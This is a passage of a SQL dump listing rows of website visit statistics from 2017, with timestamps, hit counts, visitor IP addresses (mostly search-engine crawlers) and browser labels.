244.66.246','other'),(145970,1502839687,1,1,0,0,'51.255.65.68','other'),(145971,1502840337,1,1,0,0,'217.182.132.241','other'),(145972,1502841174,1,1,0,0,'81.1.242.33','other'),(145973,1502841308,1,0,1,0,'66.249.66.155',''),(145974,1502841490,1,1,0,0,'217.182.132.4','other'),(145975,1502841664,1,1,0,0,'217.182.132.29','other'),(145976,1502841901,1,1,0,0,'216.244.66.246','other'),(145977,1502841917,1,1,0,0,'217.182.132.62','other'),(145978,1502842427,1,1,0,0,'217.182.132.183','other'),(145979,1502843697,1,1,0,0,'40.77.167.9','other'),(145980,1502843781,1,1,0,0,'216.244.66.237','other'),(145981,1502843828,1,1,0,0,'51.255.71.122','other'),(145982,1502843972,4,4,0,0,'216.244.66.246','other'),(145983,1502844177,1,1,0,0,'180.76.15.135','other'),(145984,1502844229,1,1,0,0,'51.255.71.100','other'),(145985,1502844329,1,1,0,0,'217.182.132.175','other'),(145986,1502844442,1,1,0,0,'217.182.132.97','other'),(145987,1502844655,1,0,1,0,'66.249.66.75',''),(145988,1502844766,1,1,0,0,'157.55.39.34','other'),(145989,1502845161,1,1,0,0,'8.29.198.27','other'),(145990,1502845291,1,1,0,0,'217.182.132.180','other'),(145991,1502845667,1,0,1,0,'66.249.66.155',''),(145992,1502845833,1,1,0,0,'217.182.132.191','other'),(145993,1502846104,1,1,0,0,'51.255.65.58','other'),(145994,1502846150,1,1,0,0,'217.182.132.62','other'),(145995,1502846152,1,1,0,0,'217.69.133.6','other'),(145996,1502846195,1,1,0,0,'217.69.133.5','other'),(145997,1502846323,1,1,0,0,'5.45.207.32','other'),(145998,1502846502,1,1,0,0,'216.244.66.246','other'),(145999,1502847108,1,1,0,0,'137.74.207.114','other'),(146000,1502847160,1,1,0,0,'51.255.65.9','other'),(146001,1502847250,1,1,0,0,'137.74.201.108','other'),(146002,1502847363,1,1,0,0,'51.255.65.13','other'),(146003,1502847664,1,1,0,0,'51.255.71.127','other'),(146004,1502848093,1,1,0,0,'51.255.65.72','other'),(146005,1502848423,3,3,0,0,'216.244.66.194','other'),(146006,1502848507,1,1,0,0,'51.255.65.64','other'),(146007,1502848991,1,1,0,0,'216.244.66.246','other'),(146008,1502849669,1,1,0,0,'51.255.71.133','other'),(146009,1502849915,4,4,0,0,'216.244.66.194','other'),(146010,1502850031,1,1,0,0,'51.255.65.72','other'),(146011,1502850069,2,2,0,0,'5.45.207.64','other'),(146012,1502851070,1,1,0,0,'217.182.132.171','other'),(146013,1502851463,1,1,0,0,'40.77.167.122','other'),(146014,1502851592,1,1,0,0,'51.255.65.71','other'),(146015,1502853041,1,1,0,0,'51.255.65.77','other'),(146016,1502853177,1,1,0,0,'51.255.65.41','other'),(146017,1502853211,1,1,0,0,'217.182.132.75','other'),(146018,1502853415,1,1,0,0,'51.255.65.61','other'),(146019,1502853622,1,1,0,0,'217.69.133.2','other'),(146020,1502853916,1,0,1,0,'66.249.66.155',''),(146021,1502854020,1,1,0,0,'213.180.203.32','other'),(146022,1502854090,1,0,1,0,'68.180.228.221',''),(146023,1502854159,1,1,0,0,'217.182.132.25','other'),(146024,1502854722,1,1,0,0,'51.255.65.34','other'),(146025,1502854808,3,3,0,0,'216.244.66.246','other'),(146026,1502854979,1,1,0,0,'137.74.201.108','other'),(146027,1502855188,1,1,0,0,'51.255.71.128','other'),(146028,1502855675,4,4,0,0,'216.244.66.194','other'),(146029,1502855735,1,1,0,0,'51.255.65.35','other'),(146030,1502855988,1,1,0,0,'8.29.198.27','other'),(146031,1502856011,1,1,0,0,'51.255.65.47','other'),(146032,1502856014,1,1,0,0,'5.9.111.70','other'),(146033,1502856165,1,1,0,0,'217.182.132.59','other'),(146034,1502857068,1,1,0,0,'217.69.133.4','other'),(146035,1502858708,2,2,0,0,'216.244.66.246','other'),(146036,1502858723,1,1,0,0,'176.113.170.104','chrome'),(146037,1502858735,1,1,0,0,'91.196.178.65','firefox'),(146038,1502858977,1,1,0,0,'217.182.132.183','other'),(146039,1502859456,3,3,0,0,'216.244.66.194','other'),(146040,1502859671,1,1,0,0,'46.119.4.229','firefox'),(146041,1502860719,1,1,0,0,'157.55.39.34','other'),(146042,1502860732,1,1,0,0,'217.182.132.71','other'),(146043,1502860913,1,1,0,0,'180.76.15.147','other'),(146044,1502861185,1,1,0,0,'217.182.132.179','other'),(146045,1502861386,1,1,0,0,'51.255.65.36','other'),(146046,1502861536,1,1,0,0,'217.182.132.82','other'),(146047,1502861566,1,1,0,0,'51.255.65.89','other'),(146048,1502861574,1,1,0,0,'46.211.144.190','other'),(146049,1502861705,1,1,0,0,'51.255.71.112','other'),(146050,1502861826,1,1,0,0,'51.255.65.20','other'),(146051,1502862298,1,1,0,0,'51.255.65.68','other'),(146052,1502862504,1,1,0,0,'217.182.132.193','other'),(146053,1502863119,3,3,0,0,'216.244.66.194','other'),(146054,1502863237,1,1,0,0,'95.134.220.226','chrome'),(146055,1502863427,1,1,0,0,'217.182.132.88','other'),(146056,1502864148,1,1,0,0,'66.249.93.202','chrome'),(146057,1502864208,1,1,0,0,'141.8.142.21','other'),(146058,1502864437,4,4,0,0,'91.209.11.236','other'),(146059,1502864651,1,1,0,0,'217.69.133.6','other'),(146060,1502864746,1,1,0,0,'91.196.178.69','firefox'),(146061,1502864820,1,1,0,0,'217.182.132.81','other'),(146062,1502865183,1,1,0,0,'217.182.132.180','other'),(146063,1502865348,1,1,0,0,'217.182.132.93','other'),(146064,1502865511,5,5,0,0,'216.244.66.246','other'),(146065,1502865720,1,1,0,0,'217.182.132.152','other'),(146066,1502866052,1,1,0,0,'217.182.132.61','other'),(146067,1502866096,1,1,0,0,'95.108.181.63','other'),(146068,1502866384,1,1,0,0,'51.255.71.115','other'),(146069,1502866424,1,1,0,0,'91.196.178.68','chrome'),(146070,1502866761,1,1,0,0,'51.255.65.17','other'),(146071,1502866790,1,1,0,0,'213.180.203.32','other'),(146072,1502866800,1,1,0,0,'91.209.11.236','other'),(146073,1502866809,1,1,0,0,'46.119.4.229','firefox'),(146074,1502866816,1,1,0,0,'8.29.198.25','other'),(146075,1502867098,1,1,0,0,'217.182.132.78','other'),(146076,1502867169,1,1,0,0,'81.1.242.33','other'),(146077,1502867231,1,0,1,0,'68.180.228.221',''),(146078,1502867285,2,2,0,0,'178.154.200.7','other'),(146079,1502867423,1,1,0,0,'51.255.65.41','other'),(146080,1502867982,1,1,0,0,'51.255.65.27','other'),(146081,1502868535,1,1,0,0,'51.255.71.127','other'),(146082,1502868915,1,1,0,0,'95.134.169.185','chrome'),(146083,1502869151,1,1,0,0,'95.132.7.153','chrome'),(146084,1502869200,4,4,0,0,'216.244.66.194','other'),(146085,1502869530,1,1,0,0,'51.255.65.91','other'),(146086,1502870222,1,1,0,0,'91.209.11.236','other'),(146087,1502870348,1,1,0,0,'141.8.183.1','other'),(146088,1502871031,1,0,1,0,'66.249.66.156',''),(146089,1502871288,4,4,0,0,'216.244.66.246','other'),(146090,1502871996,1,1,0,0,'163.172.251.217','chrome'),(146091,1502872123,1,1,0,0,'37.9.113.180','other'),(146092,1502872358,2,2,0,0,'94.179.79.66','firefox'),(146093,1502872587,1,1,0,0,'40.77.167.9','other'),(146094,1502872648,1,1,0,0,'91.196.178.166','chrome'),(146095,1502872687,1,1,0,0,'37.9.113.195','other'),(146096,1502872865,1,1,0,0,'5.45.207.56','other'),(146097,1502872869,1,1,0,0,'141.8.183.1','other'),(146098,1502873199,1,1,0,0,'5.45.207.32','other'),(146099,1502873270,1,1,0,0,'178.154.200.7','other'),(146100,1502873777,1,1,0,0,'91.196.178.70','chrome'),(146101,1502873817,1,1,0,0,'162.210.196.100','other'),(146102,1502874062,2,2,0,0,'91.209.11.236','other'),(146103,1502874318,1,1,0,0,'5.45.207.64','other'),(146104,1502874460,1,1,0,0,'91.196.178.70','firefox'),(146105,1502875040,1,1,0,0,'95.108.181.69','other'),(146106,1502875412,1,1,0,0,'91.196.178.133','chrome'),(146107,1502875484,1,1,0,0,'5.45.207.64','other'),(146108,1502876126,5,5,0,0,'216.244.66.246','other'),(146109,1502876507,2,2,0,0,'91.209.11.236','other'),(146110,1502876610,1,1,0,0,'91.196.178.133','chrome'),(146111,1502876972,1,1,0,0,'5.45.207.32','other'),(146112,1502877176,1,1,0,0,'91.196.177.42','chrome'),(146113,1502877654,1,1,0,0,'8.29.198.26','other'),(146114,1502878135,1,0,1,0,'68.180.228.221',''),(146115,1502878833,1,1,0,0,'91.196.178.163','chrome'),(146116,1502878894,1,1,0,0,'91.196.178.69','firefox'),(146117,1502879789,1,1,0,0,'180.76.15.137','other'),(146118,1502880507,3,3,0,0,'216.244.66.194','other'),(146119,1502880621,2,2,0,0,'216.244.66.246','other'),(146120,1502881253,1,1,0,0,'93.74.213.23','chrome'),(146121,1502881513,1,1,0,0,'178.154.200.7','other'),(146122,1502882689,1,1,0,0,'66.249.66.155','chrome'),(146123,1502882914,1,0,1,0,'68.180.228.221',''),(146124,1502883221,1,1,0,0,'216.244.66.246','other'),(146125,1502883495,2,0,2,0,'66.249.66.157',''),(146126,1502883695,1,1,0,0,'93.74.213.23','chrome'),(146127,1502883720,1,1,0,0,'95.132.17.236','firefox'),(146128,1502883869,1,1,0,0,'37.73.244.241','chrome'),(146129,1502883871,1,1,0,0,'217.182.132.72','other'),(146130,1502884044,1,1,0,0,'137.74.207.119','other'),(146131,1502884058,3,3,0,0,'216.244.66.194','other'),(146132,1502884162,1,1,0,0,'141.8.183.5','other'),(146133,1502885065,1,1,0,0,'5.45.207.32','other'),(146134,1502885086,1,1,0,0,'217.182.132.147','other'),(146135,1502885748,1,1,0,0,'217.182.132.173','other'),(146136,1502885872,1,1,0,0,'194.44.17.239','chrome'),(146137,1502885996,4,4,0,0,'216.244.66.246','other'),(146138,1502886082,1,1,0,0,'178.92.171.12','chrome'),(146139,1502886263,1,0,1,0,'68.180.228.221',''),(146140,1502886272,1,1,0,0,'66.249.66.157','chrome'),(146141,1502886970,1,1,0,0,'51.255.65.86','other'),(146142,1502887616,1,1,0,0,'5.45.207.56','other'),(146143,1502887983,1,1,0,0,'91.196.178.161','chrome'),(146144,1502888481,1,1,0,0,'8.29.198.26','other'),(146145,1502888551,1,1,0,0,'107.167.108.196','other'),(146146,1502888688,1,1,0,0,'91.124.52.94','chrome'),(146147,1502888807,2,2,0,0,'178.92.1.76','chrome'),(146148,1502889234,1,1,0,0,'91.196.178.161','chrome'),(146149,1502889303,1,1,0,0,'51.255.65.90','other'),(146150,1502889494,2,2,0,0,'216.244.66.246','other'),(146151,1502889661,1,1,0,0,'66.102.9.25','chrome'),(146152,1502889808,1,1,0,0,'217.69.133.2','other'),(146153,1502889854,1,1,0,0,'188.166.83.210','chrome'),(146154,1502890006,1,1,0,0,'37.9.113.138','other'),(146155,1502890039,1,1,0,0,'217.182.132.71','other'),(146156,1502890085,1,1,0,0,'51.255.65.86','other'),(146157,1502891051,1,1,0,0,'217.182.132.68','other'),(146158,1502891319,1,1,0,0,'31.43.22.9','firefox'),(146159,1502891344,1,1,0,0,'5.45.207.64','other'),(146160,1502891660,1,1,0,0,'216.244.66.194','other'),(146161,1502891712,1,1,0,0,'51.255.65.54','other'),(146162,1502891891,1,1,0,0,'51.255.71.119','other'),(146163,1502892366,1,1,0,0,'195.225.231.222','chrome'),(146164,1502892461,2,2,0,0,'91.196.178.69','firefox'),(146165,1502892836,2,2,0,0,'141.8.183.1','other'),(146166,1502893224,1,1,0,0,'51.255.65.32','other'),(146167,1502893502,1,1,0,0,'5.45.207.66','other'),(146168,1502893837,1,1,0,0,'87.250.224.75','other'),(146169,1502894059,1,1,0,0,'40.77.167.9','other'),(146170,1502894213,1,1,0,0,'91.209.11.236','other'),(146171,1502894242,1,1,0,0,'137.74.207.159','other'),(146172,1502894475,1,1,0,0,'217.182.132.53','other'),(146173,1502894557,8,8,0,0,'216.244.66.194','other'),(146174,1502894733,1,1,0,0,'5.45.207.15','other'),(146175,1502894735,1,1,0,0,'5.45.207.64','other'),(146176,1502894738,1,1,0,0,'51.255.65.8','other'),(146177,1502894753,1,0,1,0,'68.180.228.221',''),(146178,1502895012,1,1,0,0,'217.182.132.7','other'),(146179,1502895036,1,1,0,0,'164.132.162.159','other'),(146180,1502895270,1,1,0,0,'217.69.133.9','other'),(146181,1502896013,1,1,0,0,'216.244.66.194','other'),(146182,1502896128,3,3,0,0,'216.244.66.246','other'),(146183,1502896326,2,0,2,0,'68.180.228.221',''),(146184,1502896405,1,1,0,0,'217.182.132.176','other'),(146185,1502896453,1,1,0,0,'91.209.11.236','other'),(146186,1502896655,1,1,0,0,'217.182.132.24','other'),(146187,1502897122,1,1,0,0,'141.8.183.1','other'),(146188,1502897532,1,1,0,0,'51.255.65.4','other'),(146189,1502897534,1,1,0,0,'164.132.162.159','other'),(146190,1502897550,1,0,1,0,'66.249.66.156',''),(146191,1502897649,2,2,0,0,'91.209.11.236','other'),(146192,1502897798,1,1,0,0,'93.44.195.184','firefox'),(146193,1502899086,1,1,0,0,'40.77.167.9','other'),(146194,1502899131,1,0,1,0,'66.249.66.156',''),(146195,1502899309,1,1,0,0,'8.29.198.27','other'),(146196,1502899398,1,1,0,0,'217.182.132.5','other'),(146197,1502900392,2,2,0,0,'91.209.11.236','other'),(146198,1502900420,1,1,0,0,'51.255.65.6','other'),(146199,1502900527,7,7,0,0,'216.244.66.194','other'),(146200,1502900617,2,2,0,0,'216.244.66.246','other'),(146201,1502900618,1,1,0,0,'194.44.208.206','chrome'),(146202,1502901388,1,1,0,0,'141.8.183.1','other'),(146203,1502901659,1,1,0,0,'51.255.65.10','other'),(146204,1502901825,1,1,0,0,'5.45.207.66','other'),(146205,1502901937,1,1,0,0,'95.108.181.58','other'),(146206,1502902355,1,1,0,0,'217.182.132.27','other'),(146207,1502902914,1,1,0,0,'213.180.203.32','other'),(146208,1502902924,1,1,0,0,'51.255.71.128','other'),(146209,1502903305,1,1,0,0,'217.182.132.82','other'),(146210,1502903340,1,1,0,0,'178.154.200.7','other'),(146211,1502903345,1,1,0,0,'5.9.89.170','other'),(146212,1502903422,1,1,0,0,'151.80.27.116','other'),(146213,1502903430,1,1,0,0,'217.182.132.90','other'),(146214,1502903555,1,1,0,0,'51.255.65.22','other'),(146215,1502904023,1,1,0,0,'51.255.65.14','other'),(146216,1502904230,1,0,1,0,'66.249.66.153',''),(146217,1502904296,1,1,0,0,'217.182.132.22','other'),(146218,1502904402,1,1,0,0,'92.113.191.175','chrome'),(146219,1502905355,4,4,0,0,'216.244.66.246','other'),(146220,1502906281,1,1,0,0,'91.209.11.236','other'),(146221,1502906495,1,1,0,0,'217.182.132.57','other'),(146222,1502907586,1,1,0,0,'51.255.65.8','other'),(146223,1502907620,1,1,0,0,'141.8.142.21','other'),(146224,1502907757,1,1,0,0,'213.180.203.32','other'),(146225,1502908246,1,1,0,0,'37.73.195.101','chrome'),(146226,1502908424,1,1,0,0,'217.69.133.3','other'),(146227,1502909138,1,0,1,0,'66.249.66.155',''),(146228,1502909187,1,1,0,0,'51.255.65.78','other'),(146229,1502909512,1,1,0,0,'37.73.246.160','chrome'),(146230,1502909607,1,1,0,0,'217.182.132.55','other'),(146231,1502910150,1,1,0,0,'8.29.198.27','other'),(146232,1502910357,1,1,0,0,'51.255.65.5','other'),(146233,1502910499,3,3,0,0,'216.244.66.194','other'),(146234,1502910821,5,5,0,0,'216.244.66.246','other'),(146235,1502911908,1,0,1,0,'66.249.66.156',''),(146236,1502912810,1,1,0,0,'91.196.178.71','chrome'),(146237,1502912820,2,2,0,0,'217.182.132.37','other'),(146238,1502913374,1,1,0,0,'51.255.65.25','other'),(146239,1502913768,1,1,0,0,'180.76.15.18','other'),(146240,1502913839,1,1,0,0,'212.55.74.17','other'),(146241,1502913894,1,1,0,0,'217.69.133.203','other'),(146242,1502914569,1,1,0,0,'164.132.162.153','other'),(146243,1502914699,1,0,1,0,'66.249.66.155',''),(146244,1502915157,1,1,0,0,'217.182.132.36','other'),(146245,1502915194,3,3,0,0,'216.244.66.194','other'),(146246,1502915210,5,5,0,0,'216.244.66.246','other'),(146247,1502915589,1,1,0,0,'217.182.132.71','other'),(146248,1502915825,1,1,0,0,'66.249.66.74','chrome'),(146249,1502915872,1,0,1,0,'66.249.66.157',''),(146250,1502915947,1,1,0,0,'51.255.65.11','other'),(146251,1502915950,1,1,0,0,'51.255.65.30','other'),(146252,1502917310,1,1,0,0,'51.255.71.127','other'),(146253,1502917670,2,2,0,0,'5.45.207.32','other'),(146254,1502918556,1,0,1,0,'68.180.228.221',''),(146255,1502918777,1,1,0,0,'157.55.39.34','other'),(146256,1502918804,1,1,0,0,'51.255.71.114','other'),(146257,1502919686,1,0,1,0,'66.249.66.75',''),(146258,1502919741,1,1,0,0,'91.209.11.236','other'),(146259,1502920093,3,3,0,0,'216.244.66.246','other'),(146260,1502920507,1,1,0,0,'40.77.167.9','other'),(146261,1502920573,1,1,0,0,'51.255.65.40','other'),(146262,1502920582,1,1,0,0,'5.255.253.2','other'),(146263,1502920802,1,1,0,0,'137.74.207.170','other'),(146264,1502920829,1,1,0,0,'137.74.207.161','other'),(146265,1502920871,1,0,1,0,'66.249.66.157',''),(146266,1502920891,1,1,0,0,'5.45.207.56','other'),(146267,1502920993,1,1,0,0,'8.29.198.26','other'),(146268,1502921202,1,1,0,0,'51.255.65.20','other'),(146269,1502921263,1,1,0,0,'216.244.66.194','other'),(146270,1502921301,2,2,0,0,'40.77.167.122','other'),(146271,1502921509,1,1,0,0,'91.209.11.236','other'),(146272,1502922263,2,0,2,0,'66.249.66.76',''),(146273,1502922267,1,1,0,0,'217.182.132.86','other'),(146274,1502922490,1,1,0,0,'217.182.132.56','other'),(146275,1502922755,1,1,0,0,'51.255.65.88','other'),(146276,1502923493,1,1,0,0,'51.255.71.129','other'),(146277,1502923801,1,0,1,0,'66.249.66.157',''),(146278,1502923886,1,1,0,0,'5.45.207.42','other'),(146279,1502924333,1,1,0,0,'217.182.132.56','other'),(146280,1502924820,9,9,0,0,'216.244.66.194','other'),(146281,1502925033,1,1,0,0,'137.74.207.120','other'),(146282,1502925532,1,1,0,0,'51.255.65.89','other'),(146283,1502925991,1,1,0,0,'51.255.65.44','other'),(146284,1502926240,1,1,0,0,'51.255.71.100','other'),(146285,1502926374,1,1,0,0,'51.255.65.21','other'),(146286,1502926472,1,1,0,0,'216.244.66.246','other'),(146287,1502927481,1,1,0,0,'217.182.132.60','other'),(146288,1502927612,1,1,0,0,'217.182.132.171','other'),(146289,1502928311,1,1,0,0,'137.74.207.102','other'),(146290,1502928573,1,1,0,0,'66.249.66.75','chrome'),(146291,1502928592,1,1,0,0,'91.209.11.236','other'),(146292,1502928977,1,1,0,0,'37.115.188.137','firefox'),(146293,1502929645,1,1,0,0,'51.255.65.90','other'),(146294,1502929653,1,1,0,0,'37.9.113.180','other'),(146295,1502929831,1,1,0,0,'5.45.207.15','other'),(146296,1502930019,1,1,0,0,'40.77.167.122','other'),(146297,1502930108,1,1,0,0,'51.255.71.101','other'),(146298,1502930233,1,1,0,0,'51.255.71.130','other'),(146299,1502930430,1,1,0,0,'95.108.181.69','other'),(146300,1502930433,1,1,0,0,'178.154.200.7','other'),(146301,1502930562,1,1,0,0,'216.244.66.246','other'),(146302,1502931142,1,1,0,0,'37.9.113.138','other'),(146303,1502931576,1,1,0,0,'51.255.71.111','other'),(146304,1502931805,1,1,0,0,'178.154.200.7','other'),(146305,1502931822,1,1,0,0,'8.29.198.27','other'),(146306,1502932120,4,4,0,0,'216.244.66.194','other'),(146307,1502932741,1,1,0,0,'51.255.65.85','other'),(146308,1502932881,1,1,0,0,'40.77.167.122','other'),(146309,1502933167,1,1,0,0,'213.180.203.32','other'),(146310,1502933417,1,1,0,0,'5.45.207.32','other'),(146311,1502933552,1,1,0,0,'141.8.183.5','other'),(146312,1502933794,1,0,1,0,'68.180.228.221',''),(146313,1502934414,1,1,0,0,'217.182.132.5','other'),(146314,1502935163,1,1,0,0,'51.255.65.5','other'),(146315,1502935677,1,1,0,0,'216.244.66.194','other'),(146316,1502935703,1,1,0,0,'5.45.207.15','other'),(146317,1502935867,1,1,0,0,'141.8.142.21','other'),(146318,1502936218,1,1,0,0,'51.255.65.18','other'),(146319,1502936483,1,1,0,0,'137.74.201.100','other'),(146320,1502936518,1,1,0,0,'137.74.207.108','other'),(146321,1502936549,1,1,0,0,'217.182.132.5','other'),(146322,1502936588,1,1,0,0,'51.255.71.125','other'),(146323,1502937397,1,1,0,0,'51.255.65.70','other'),(146324,1502937518,1,1,0,0,'40.77.167.60','other'),(146325,1502937556,1,1,0,0,'164.132.162.154','other'),(146326,1502937625,1,1,0,0,'141.8.183.1','other'),(146327,1502937861,1,1,0,0,'137.74.207.109','other'),(146328,1502937900,1,1,0,0,'54.165.59.7','other'),(146329,1502938222,2,2,0,0,'5.45.207.32','other'),(146330,1502938647,1,1,0,0,'217.182.132.79','other'),(146331,1502939518,1,1,0,0,'5.45.207.32','other'),(146332,1502939702,1,1,0,0,'51.255.65.75','other'),(146333,1502940044,1,1,0,0,'51.255.65.92','other'),(146334,1502940846,3,3,0,0,'216.244.66.246','other'),(146335,1502940987,1,1,0,0,'217.182.132.86','other'),(146336,1502941073,1,1,0,0,'141.8.183.1','other'),(146337,1502941086,3,3,0,0,'216.244.66.194','other'),(146338,1502941918,1,1,0,0,'5.45.207.32','other'),(146339,1502942082,1,1,0,0,'137.74.207.108','other'),(146340,1502942217,1,1,0,0,'51.255.65.33','other'),(146341,1502942347,1,1,0,0,'51.255.65.7','other'),(146342,1502942418,2,2,0,0,'217.182.132.152','other'),(146343,1502942650,1,1,0,0,'8.29.198.26','other'),(146344,1502942891,1,1,0,0,'51.255.65.45','other'),(146345,1502944128,1,1,0,0,'141.8.183.1','other'),(146346,1502944296,1,1,0,0,'51.255.65.61','other'),(146347,1502944377,1,1,0,0,'216.244.66.246','other'),(146348,1502944533,1,1,0,0,'217.182.132.70','other'),(146349,1502944813,1,1,0,0,'217.182.132.29','other'),(146350,1502944880,1,1,0,0,'51.255.65.33','other'),(146351,1502944903,1,1,0,0,'217.182.132.149','other'),(146352,1502945092,1,1,0,0,'91.196.178.71','firefox'),(146353,1502945289,3,3,0,0,'216.244.66.194','other'),(146354,1502945422,1,1,0,0,'51.255.71.131','other'),(146355,1502945436,1,1,0,0,'217.182.132.191','other'),(146356,1502945749,1,1,0,0,'217.182.132.192','other'),(146357,1502946211,3,3,0,0,'216.244.66.246','other'),(146358,1502946387,1,1,0,0,'51.255.65.84','other'),(146359,1502946764,1,1,0,0,'91.196.178.68','firefox'),(146360,1502946793,1,1,0,0,'217.182.132.27','other'),(146361,1502946884,1,1,0,0,'51.255.65.72','other'),(146362,1502947789,1,1,0,0,'51.255.65.85','other'),(146363,1502947889,1,1,0,0,'91.196.178.71','firefox'),(146364,1502949141,1,1,0,0,'91.196.178.167','chrome'),(146365,1502949175,1,1,0,0,'91.196.179.33','firefox'),(146366,1502949805,1,1,0,0,'91.196.178.70','chrome'),(146367,1502949974,1,1,0,0,'51.255.65.81','other'),(146368,1502950215,1,1,0,0,'66.249.93.202','chrome'),(146369,1502950362,1,1,0,0,'217.182.132.15','other'),(146370,1502950506,1,1,0,0,'5.45.207.64','other'),(146371,1502950596,1,1,0,0,'91.196.178.167','chrome'),(146372,1502951023,1,1,0,0,'217.182.132.154','other'),(146373,1502951154,1,1,0,0,'216.244.66.194','other'),(146374,1502951896,1,1,0,0,'91.196.177.46','chrome'),(146375,1502952021,1,0,1,0,'68.180.228.221',''),(146376,1502952347,1,1,0,0,'216.244.66.246','other'),(146377,1502952423,1,1,0,0,'216.244.66.194','other'),(146378,1502952827,1,1,0,0,'180.76.15.135','other'),(146379,1502953269,1,1,0,0,'91.196.178.72','firefox'),(146380,1502953318,1,1,0,0,'5.45.207.42','other'),(146381,1502953483,1,1,0,0,'8.29.198.26','other'),(146382,1502953566,1,1,0,0,'164.132.162.164','other'),(146383,1502953796,1,1,0,0,'91.196.178.72','chrome'),(146384,1502954257,1,1,0,0,'137.74.207.108','other'),(146385,1502954274,1,1,0,0,'95.158.60.177','chrome'),(146386,1502954351,1,1,0,0,'216.244.66.194','other'),(146387,1502954629,1,1,0,0,'217.182.132.174','other'),(146388,1502954797,1,1,0,0,'164.132.162.155','other'),(146389,1502955051,1,1,0,0,'217.182.132.4','other'),(146390,1502955318,1,1,0,0,'54.208.102.37','other'),(146391,1502955790,1,1,0,0,'195.20.97.50','chrome'),(146392,1502955966,1,1,0,0,'51.255.65.89','other'),(146393,1502956211,1,1,0,0,'51.255.65.57','other'),(146394,1502956571,1,1,0,0,'51.255.65.51','other'),(146395,1502956653,1,1,0,0,'37.54.16.139','chrome'),(146396,1502956882,1,1,0,0,'195.138.86.169','chrome'),(146397,1502956913,4,4,0,0,'216.244.66.246','other'),(146398,1502956954,1,1,0,0,'217.182.132.36','other'),(146399,1502957055,1,1,0,0,'178.154.200.7','other'),(146400,1502957076,1,1,0,0,'217.182.132.88','other'),(146401,1502957430,1,1,0,0,'46.201.175.91','firefox'),(146402,1502957681,1,1,0,0,'217.182.132.19','other'),(146403,1502957697,5,5,0,0,'62.210.101.96','other'),(146404,1502958058,1,1,0,0,'217.182.132.80','other'),(146405,1502958082,1,1,0,0,'51.255.65.46','other'),(146406,1502958145,1,1,0,0,'5.45.207.15','other'),(146407,1502958340,1,1,0,0,'195.16.76.240','chrome'),(146408,1502958401,1,1,0,0,'37.9.113.195','other'),(146409,1502958740,1,1,0,0,'217.182.132.190','other'),(146410,1502958756,1,1,0,0,'5.45.207.64','other'),(146411,1502960276,1,1,0,0,'217.69.133.2','other'),(146412,1502960426,1,1,0,0,'217.182.132.172','other'),(146413,1502960636,1,1,0,0,'91.196.178.68','firefox'),(146414,1502960654,1,1,0,0,'171.25.175.235','chrome'),(146415,1502960753,1,1,0,0,'92.112.237.201','chrome'),(146416,1502960973,1,1,0,0,'91.209.11.236','other'),(146417,1502961148,1,1,0,0,'217.69.133.6','other'),(146418,1502961346,1,1,0,0,'87.250.224.54','other'),(146419,1502961756,1,1,0,0,'217.182.132.71','other'),(146420,1502961926,1,1,0,0,'51.255.65.25','other'),(146421,1502962174,1,1,0,0,'217.182.132.174','other'),(146422,1502962198,4,4,0,0,'216.244.66.246','other'),(146423,1502962408,1,1,0,0,'217.182.132.156','other'),(146424,1502962690,1,1,0,0,'217.182.132.173','other'),(146425,1502962875,1,1,0,0,'40.77.167.9','other'),(146426,1502963024,6,6,0,0,'216.244.66.194','other'),(146427,1502963310,1,1,0,0,'217.182.132.15','other'),(146428,1502963316,1,1,0,0,'178.154.200.7','other'),(146429,1502963383,1,1,0,0,'91.196.176.18','firefox'),(146430,1502963639,1,0,1,0,'68.180.228.221',''),(146431,1502963694,1,1,0,0,'5.255.253.14','other'),(146432,1502963927,1,1,0,0,'217.182.132.151','other'),(146433,1502964308,1,1,0,0,'8.29.198.27','other'),(146434,1502964556,1,1,0,0,'194.44.211.114','chrome'),(146435,1502964683,4,4,0,0,'216.244.66.194','other'),(146436,1502964922,1,1,0,0,'217.182.132.192','other'),(146437,1502964958,1,1,0,0,'216.244.66.246','other'),(146438,1502965308,1,1,0,0,'51.255.65.84','other'),(146439,1502965482,1,1,0,0,'46.201.240.76','chrome'),(146440,1502965655,1,1,0,0,'95.108.181.69','other'),(146441,1502966460,1,1,0,0,'51.255.65.86','other'),(146442,1502966695,1,1,0,0,'141.8.183.1','other'),(146443,1502967251,1,1,0,0,'51.255.65.84','other'),(146444,1502967472,1,1,0,0,'216.244.66.194','other'),(146445,1502967755,1,1,0,0,'178.154.200.27','other'),(146446,1502967912,1,1,0,0,'141.8.183.1','other'),(146447,1502968628,1,1,0,0,'216.244.66.194','other'),(146448,1502969044,1,1,0,0,'217.182.132.81','other'),(146449,1502969239,1,1,0,0,'141.8.183.1','other'),(146450,1502969332,1,1,0,0,'95.108.181.63','other'),(146451,1502970006,1,1,0,0,'195.10.210.49','chrome'),(146452,1502970107,1,1,0,0,'217.182.132.28','other'),(146453,1502970189,1,1,0,0,'91.209.11.236','other'),(146454,1502970654,1,1,0,0,'5.45.207.32','other'),(146455,1502970737,1,1,0,0,'95.108.181.69','other'),(146456,1502970795,1,1,0,0,'51.255.71.101','other'),(146457,1502970898,1,1,0,0,'5.45.207.64','other'),(146458,1502971248,1,1,0,0,'91.196.178.68','firefox'),(146459,1502971436,1,1,0,0,'91.124.0.195','chrome'),(146460,1502971588,1,0,1,0,'68.180.228.221',''),(146461,1502971626,1,1,0,0,'51.255.65.42','other'),(146462,1502971778,1,1,0,0,'5.45.207.57','other'),(146463,1502971807,2,2,0,0,'216.244.66.246','other'),(146464,1502971918,1,1,0,0,'46.201.175.91','firefox'),(146465,1502972077,1,1,0,0,'217.69.133.6','other'),(146466,1502972316,1,1,0,0,'178.154.200.7','other'),(146467,1502972459,1,1,0,0,'91.227.206.29','chrome'),(146468,1502972683,1,1,0,0,'91.209.11.236','other'),(146469,1502973125,1,1,0,0,'51.255.65.26','other'),(146470,1502973217,1,1,0,0,'51.255.65.77','other'),(146471,1502973442,1,1,0,0,'40.77.167.122','other'),(146472,1502974371,1,1,0,0,'51.255.65.67','other'),(146473,1502974375,1,1,0,0,'217.182.132.184','other'),(146474,1502974662,5,5,0,0,'216.244.66.194','other'),(146475,1502974716,1,1,0,0,'164.132.164.180','other'),(146476,1502974962,1,1,0,0,'51.255.65.75','other'),(146477,1502975051,1,1,0,0,'217.182.132.84','other'),(146478,1502975132,1,1,0,0,'217.182.132.51','other'),(146479,1502975134,1,1,0,0,'8.29.198.26','other'),(146480,1502975255,1,1,0,0,'51.255.65.88','other'),(146481,1502975434,1,1,0,0,'195.138.86.169','chrome'),(146482,1502975736,1,1,0,0,'216.244.